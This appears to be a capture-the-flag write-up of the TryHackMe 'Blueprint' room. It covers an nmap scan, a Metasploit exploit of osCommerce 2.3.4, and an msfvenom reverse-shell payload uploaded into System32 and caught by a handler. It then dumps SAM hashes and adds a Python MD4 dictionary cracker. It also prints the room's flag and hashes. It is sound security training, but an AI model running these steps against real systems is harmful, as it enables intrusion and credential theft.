
TryHackMe Writeup - Blueprint Room

 ·  ☕ 4 min read  ·  👨‍💻 g4nd1v
Title: https://tryhackme.com/room/blueprint
Description: Hack into this Windows machine and escalate your privileges to Administrator.
Difficulty: Easy
Maker: https://tryhackme.com/p/MrSeth6797

Nmap

└─$ nmap -sC -sV -oA nmap/blueprint 10.10.28.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 12:33 EST
Nmap scan report for 10.10.28.87
Host is up (0.15s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: 404 - File or directory not found.
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
| http-methods:
|_  Potentially risky methods: TRACE
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 1s, median: 1s
| smb-os-discovery:
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-28T17:35:00+00:00
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:b8:60:4f:ba:87 (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-02-28T17:35:00
|_  start_date: 2024-02-28T17:27:12
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Ports 443 and 8080 serve an Apache/PHP stack with directory listing enabled at /, which exposes osCommerce 2.3.4; SMB identifies the host as Windows 7 Home Basic SP1 with message signing not required. A public exploit is available for this osCommerce version: https://www.exploit-db.com/exploits/44374

root flag

Instead of using the exploit directly, I used the Metasploit Framework.

Start by searching for the exploit in msfconsole (search oscommerce).

Set the required options (RHOSTS, plus LHOST for the reverse callback), run the exploit, and it hands you a Meterpreter session. Because the exploit executes through PHP, this is a PHP Meterpreter, which matters later.

Now that we have a shell, navigate to the Administrator's desktop and read the root flag (the fact that the web server process can read this directory already tells us it runs with high privileges):
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > cat root.txt.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}

Hashdump

The session we have is a PHP Meterpreter, which is no use for dumping hashes: hashdump depends on the priv extension, which only the native Windows Meterpreter provides, so running it in this session errors out.

meterpreter > hashdump
[-] The "hashdump" command requires the "priv" extension to be loaded (run: `load priv`)

So what we need to do is upgrade the PHP shell to a native Windows Meterpreter. To do so, I have found a blog which seems to be very helpful - https://dl.packetstormsecurity.net/papers/attack/root3.pdf and https://sckull.github.io/posts/blueprint/

According to the blog, first generate the native payload on the attacking machine: msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=1338 -f exe > payload.exe

Then, inside the PHP Meterpreter, change into the System32 folder (cd c:\\windows\\system32) and push the binary to the target with upload payload.exe. Writing into System32 only works because the web server on this box runs with high privileges, as the flag read above showed; on a target where it does not, upload to a directory the web server user can write to, such as C:\Windows\Temp.

Open a second msfconsole and start a handler for the native Windows payload, matching the LHOST and LPORT baked into the executable:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport 1338
exploit

Now, from the PHP Meterpreter, run execute -f payload.exe. The handler catches the callback and we get a native Windows Meterpreter, where hashdump works: the priv extension is available, and the process evidently has enough privilege to read the SAM.


These are the hashes, in pwdump format (user:RID:LM hash:NT hash:::):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

Two things stand out before cracking anything: the LM field of every account is aad3b435b51404eeaad3b435b51404ee, the LM hash of an empty string, which means no LM hashes are stored; and Guest's NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string, i.e. a blank password. Finally, the NT hashes can be looked up on the CrackStation website (https://crackstation.net), which only succeeds for passwords in its precomputed tables; if that fails, run them through hashcat with -m 1000 (NTLM) and a wordlist.
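To show what CrackStation or hashcat are doing with these lines, here is an added example that is not part of the original write-up: it parses the hashdump output above, flags the blank-password and LM-storage findings from the hash values alone, and runs an offline dictionary attack using a pure-Python MD4, since an NT hash is just MD4 over the UTF-16LE encoding of the password. The candidate wordlist is constructed for the demo and is not the list that cracks the room's Administrator password.

```python
# Added example, not from the original write-up. Parse the pwdump-style
# hashdump lines, audit them, and attempt an offline dictionary attack on the
# NT hashes. NT hash = MD4(UTF-16LE(password)), implemented below (RFC 1320).
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" -> no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" -> blank password

# Hashdump output copied from the write-up above.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
"""


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF


def _md4_block(state, block):
    """One MD4 compression over a 64-byte block: three rounds of 16 steps."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for f, k, order, shifts in rounds:
        for i, j in enumerate(order):
            a = _rotl((a + f(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
            a, b, c, d = d, a, b, c  # rotate register roles for the next step
    return [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    for off in range(0, len(msg), 64):
        state = _md4_block(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4 over the UTF-16LE password, hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Parse user:rid:lm:nt::: lines into dicts with lower-cased hex hashes."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid),
                        "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Findings per user that need no cracking, only the stored hash values."""
    findings = {}
    for e in entries:
        notes = []
        if e["lm"] != EMPTY_LM:
            notes.append("LM hash stored (trivially crackable)")
        if e["nt"] == EMPTY_NT:
            notes.append("blank password")
        if e["rid"] == 500:
            notes.append("built-in Administrator (RID 500)")
        findings[e["user"]] = notes
    return findings


def crack(entries, wordlist):
    """Offline dictionary attack: hash each candidate once, match every user."""
    table = {nt_hash(w): w for w in wordlist}
    table[EMPTY_NT] = ""  # the empty password is always worth checking
    return {e["user"]: table.get(e["nt"]) for e in entries}


if __name__ == "__main__":
    entries = parse_hashdump(HASHDUMP)
    for user, notes in audit(entries).items():
        print(f"{user}: {', '.join(notes) or 'no hash-level findings'}")
    # Constructed demo wordlist, not the one that cracks the room's password.
    for user, pw in crack(entries, ["password", "Password1", "welcome1"]).items():
        print(f"{user}: {'cracked -> ' + repr(pw) if pw is not None else 'not in wordlist'}")
```

Note that cracking is unsalted and per-candidate, not per-user: one MD4 per word is compared against every NT hash at once, which is why leaked SAM dumps fall so quickly to a good wordlist.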

